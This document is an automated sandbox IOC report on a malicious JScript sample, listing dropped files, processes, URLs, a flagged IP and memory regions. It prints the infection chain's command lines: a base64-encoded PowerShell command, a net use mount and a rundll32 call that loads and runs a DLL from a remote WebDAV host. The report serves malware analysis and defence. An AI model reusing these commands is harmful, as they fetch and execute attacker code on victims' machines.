IOC Report
25458290022066624563.js

loading gif

Files

File Path
Type
Category
Malicious
25458290022066624563.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izsm44k1.jhz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xg5shtqi.yo2.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\25458290022066624563.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4AOAAyAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwA7ADsAOwA7ADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADgAMgBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQA2ADUAMwA4ADEANgAxADAAMAAzADAAOQAzADUALgBkAGwAbAAsAEUAbgB0AHIAeQA=
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" \\94.159.113.82@8888\davwwwroot\165381610030935.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\net.exe
"C:\Windows\system32\net.exe" use \\94.159.113.82@8888\davwwwroot\

URLs

Name
IP
Malicious
http://94.159.113.82:8888/ih
unknown
https://aka.ms/pscore6
unknown
http://94.159.113.82:8888/8
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://94.159.113.82:8888/
unknown

IPs

IP
Domain
Country
Malicious
94.159.113.82
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
1F342F2E000
heap
page read and write
1F342F74000
heap
page read and write
2526CCCF000
heap
page read and write
1F342F6A000
heap
page read and write
1F344D86000
heap
page read and write
2526EE37000
heap
page read and write
1F344A10000
heap
page read and write
1F344DA7000
heap
page read and write
1F342F6A000
heap
page read and write
281A922B000
heap
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
1F344D9A000
heap
page read and write
1F344D73000
heap
page read and write
1F34308B000
heap
page read and write
B2769DE000
stack
page read and write
1F34308A000
heap
page read and write
25200116000
trusted library allocation
page read and write
1F342F20000
heap
page read and write
B276FF7000
stack
page read and write
72D05FE000
stack
page read and write
8656FCB000
stack
page read and write
1F342F4D000
heap
page read and write
1F342F69000
heap
page read and write
B276893000
stack
page read and write
1F344D6F000
heap
page read and write
26E3EB1C000
heap
page read and write
2526CBE0000
heap
page read and write
B27699E000
stack
page read and write
1F342F5F000
heap
page read and write
D53687E000
stack
page read and write
1F344D9D000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
26E3EAA0000
remote allocation
page read and write
281A9520000
heap
page read and write
26E3EB0E000
heap
page read and write
1F344DB0000
heap
page read and write
2526CEB0000
heap
page execute and read and write
1F344D6E000
heap
page read and write
1F344D67000
heap
page read and write
1F344D86000
heap
page read and write
1F342F51000
heap
page read and write
1F342F5E000
heap
page read and write
26E3EA20000
heap
page read and write
1F342F5C000
heap
page read and write
1F344D9A000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
281A9234000
heap
page read and write
B27737B000
stack
page read and write
7FFD9B972000
trusted library allocation
page read and write
2526CAE0000
heap
page read and write
2520001B000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
1F344DA2000
heap
page read and write
7FFD9B930000
trusted library allocation
page read and write
1F344D6B000
heap
page read and write
2526CE90000
heap
page read and write
1F342F54000
heap
page read and write
26E3EAE0000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9B794000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
2526CD6A000
heap
page read and write
281A922B000
heap
page read and write
1F344D6E000
heap
page read and write
26E3EB35000
heap
page read and write
26E3EB3D000
heap
page read and write
281A9563000
heap
page read and write
1F344DA6000
heap
page read and write
1F34308E000
heap
page read and write
2526EC31000
heap
page read and write
2526CD0C000
heap
page read and write
2526EE0F000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1F3451E6000
heap
page read and write
281A9140000
heap
page read and write
26E3EA50000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
281A9239000
heap
page read and write
7DF4BF380000
trusted library allocation
page execute and read and write
B276D7C000
stack
page read and write
26E3EB12000
heap
page read and write
1F342F1F000
heap
page read and write
1F344D9B000
heap
page read and write
25200053000
trusted library allocation
page read and write
72D0AFF000
stack
page read and write
26E3EB21000
heap
page read and write
1F343080000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1F342F6A000
heap
page read and write
72D08FE000
stack
page read and write
865727E000
stack
page read and write
2526EDFB000
heap
page read and write
1F344D93000
heap
page read and write
26E3EB1C000
heap
page read and write
865747E000
stack
page read and write
281AAD30000
heap
page read and write
1F342FF0000
heap
page read and write
2526CE95000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
252002C2000
trusted library allocation
page read and write
281A9218000
heap
page read and write
2526EB40000
heap
page read and write
1F345689000
heap
page read and write
1F342DF0000
heap
page read and write
1F344D86000
heap
page read and write
2526EB80000
heap
page read and write
2526EE00000
heap
page read and write
1F342F48000
heap
page read and write
1F344D6E000
heap
page read and write
2526EC77000
heap
page execute and read and write
281A9235000
heap
page read and write
1F344D76000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
2526EBEB000
heap
page read and write
25200159000
trusted library allocation
page read and write
2526CEE0000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1F342F30000
heap
page read and write
1F344D86000
heap
page read and write
1F34308A000
heap
page read and write
D5368FE000
stack
page read and write
26E3EB21000
heap
page read and write
1F342F60000
heap
page read and write
25210001000
trusted library allocation
page read and write
25210010000
trusted library allocation
page read and write
1F344D60000
heap
page read and write
1F342F74000
heap
page read and write
281A9150000
heap
page read and write
2526EDF0000
heap
page read and write
B2771FE000
stack
page read and write
2526CD7B000
heap
page read and write
281A9252000
heap
page read and write
1F344D67000
heap
page read and write
281A923F000
heap
page read and write
26E3EB48000
heap
page read and write
281ACA10000
trusted library allocation
page read and write
7FFD9B876000
trusted library allocation
page execute and read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
26E3EB16000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
72D06FE000
stack
page read and write
281A9245000
heap
page read and write
B276CFE000
stack
page read and write
1F342F74000
heap
page read and write
2526CD07000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
26E3EAA0000
remote allocation
page read and write
7FFD9B941000
trusted library allocation
page read and write
7FFD9B944000
trusted library allocation
page read and write
1F342EF7000
heap
page read and write
7FFD9B84C000
trusted library allocation
page execute and read and write
7FFD9B793000
trusted library allocation
page execute and read and write
281A9228000
heap
page read and write
25200064000
trusted library allocation
page read and write
72D0CFD000
stack
page read and write
1F344D73000
heap
page read and write
281A9170000
heap
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
72D0BFE000
stack
page read and write
1F342F74000
heap
page read and write
26E3EB17000
heap
page read and write
7FFD9B94A000
trusted library allocation
page read and write
1F344DAC000
heap
page read and write
26E3EB16000
heap
page read and write
281A9234000
heap
page read and write
26E3EAA0000
remote allocation
page read and write
1F344D76000
heap
page read and write
281A9234000
heap
page read and write
B276F78000
stack
page read and write
1F342F55000
heap
page read and write
1F344D7F000
heap
page read and write
2520006E000
trusted library allocation
page read and write
1F344D86000
heap
page read and write
B27707B000
stack
page read and write
2526CD80000
trusted library allocation
page read and write
2526CCC1000
heap
page read and write
1F34308C000
heap
page read and write
26E3EE45000
heap
page read and write
26E3EB3B000
heap
page read and write
1F344DA7000
heap
page read and write
2526CCDF000
heap
page read and write
281A9560000
heap
page read and write
1F344D6B000
heap
page read and write
25200160000
trusted library allocation
page read and write
1F344D61000
heap
page read and write
2526CC93000
heap
page read and write
72D09FF000
stack
page read and write
2526CC80000
heap
page read and write
25200106000
trusted library allocation
page read and write
2526F170000
heap
page read and write
2520011A000
trusted library allocation
page read and write
26E3EB12000
heap
page read and write
1F342F74000
heap
page read and write
1F344D7B000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
2526ED10000
heap
page read and write
25200506000
trusted library allocation
page read and write
1F344D9A000
heap
page read and write
2526CCCD000
heap
page read and write
26E3EB48000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1F342F59000
heap
page read and write
1F344DA2000
heap
page read and write
2526CDA0000
trusted library allocation
page read and write
D5365AA000
stack
page read and write
865737C000
stack
page read and write
252004AC000
trusted library allocation
page read and write
1F342F4D000
heap
page read and write
1F342F43000
heap
page read and write
2526EBC6000
heap
page read and write
1F344D6E000
heap
page read and write
1F344DAF000
heap
page read and write
B2772FE000
stack
page read and write
1F345979000
heap
page read and write
1F344D61000
heap
page read and write
1F344D77000
heap
page read and write
7FFD9B850000
trusted library allocation
page execute and read and write
1F34308C000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2526EBCD000
heap
page read and write
1F342EF0000
heap
page read and write
1F344D8F000
heap
page read and write
25200538000
trusted library allocation
page read and write
2526EB82000
heap
page read and write
1F344D86000
heap
page read and write
1F342F43000
heap
page read and write
7FFD9B7AC000
trusted library allocation
page read and write
2526CBC0000
heap
page read and write
86572FF000
stack
page read and write
1F344D9A000
heap
page read and write
1F344D8B000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
281A9580000
heap
page read and write
1F344DA2000
heap
page read and write
1F344D77000
heap
page read and write
281A922F000
heap
page read and write
2526CCBF000
heap
page read and write
B276DFE000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
B2770F9000
stack
page read and write
1F3454F6000
heap
page read and write
7FFD9B846000
trusted library allocation
page read and write
2520009D000
trusted library allocation
page read and write
1F3451E9000
heap
page read and write
1F344DAF000
heap
page read and write
2526CC60000
trusted library allocation
page read and write
26E3EB0E000
heap
page read and write
1F344D9A000
heap
page read and write
2526ECF0000
heap
page read and write
281A9210000
heap
page read and write
B276FFE000
stack
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
2526CDF0000
heap
page read and write
2526CD90000
heap
page readonly
25200050000
trusted library allocation
page read and write
1F344D9A000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
26E3EAE8000
heap
page read and write
72D0EFB000
stack
page read and write
1F343085000
heap
page read and write
2521006F000
trusted library allocation
page read and write
26E3EB21000
heap
page read and write
1F344D62000
heap
page read and write
1F342F74000
heap
page read and write
1F342F74000
heap
page read and write
72D04F4000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
B276E7E000
stack
page read and write
2526EC70000
heap
page execute and read and write
1F344D64000
heap
page read and write
B276EFF000
stack
page read and write
1F342ED0000
heap
page read and write
1F344D7F000
heap
page read and write
2526CEE5000
heap
page read and write
1F344D97000
heap
page read and write
2520053E000
trusted library allocation
page read and write
281A9585000
heap
page read and write
1F344D9C000
heap
page read and write
86573FE000
stack
page read and write
B276C7E000
stack
page read and write
2526EBFF000
heap
page read and write
1F342F49000
heap
page read and write
1F344DAB000
heap
page read and write
7FFD9B792000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
26E3EB35000
heap
page read and write
1F34537C000
heap
page read and write
1F344DB0000
heap
page read and write
1F344EE1000
heap
page read and write
281A958B000
heap
page read and write
26E3EA30000
heap
page read and write
1F344D6F000
heap
page read and write
1F34308C000
heap
page read and write
25200055000
trusted library allocation
page read and write
B27691E000
stack
page read and write
2526EB30000
heap
page execute and read and write
25200001000
trusted library allocation
page read and write
1F344D87000
heap
page read and write
2526CC20000
heap
page read and write
B27717F000
stack
page read and write
26E3EB0A000
heap
page read and write
25200023000
trusted library allocation
page read and write
26E3EE40000
heap
page read and write
There are 294 hidden memdumps, click here to show them.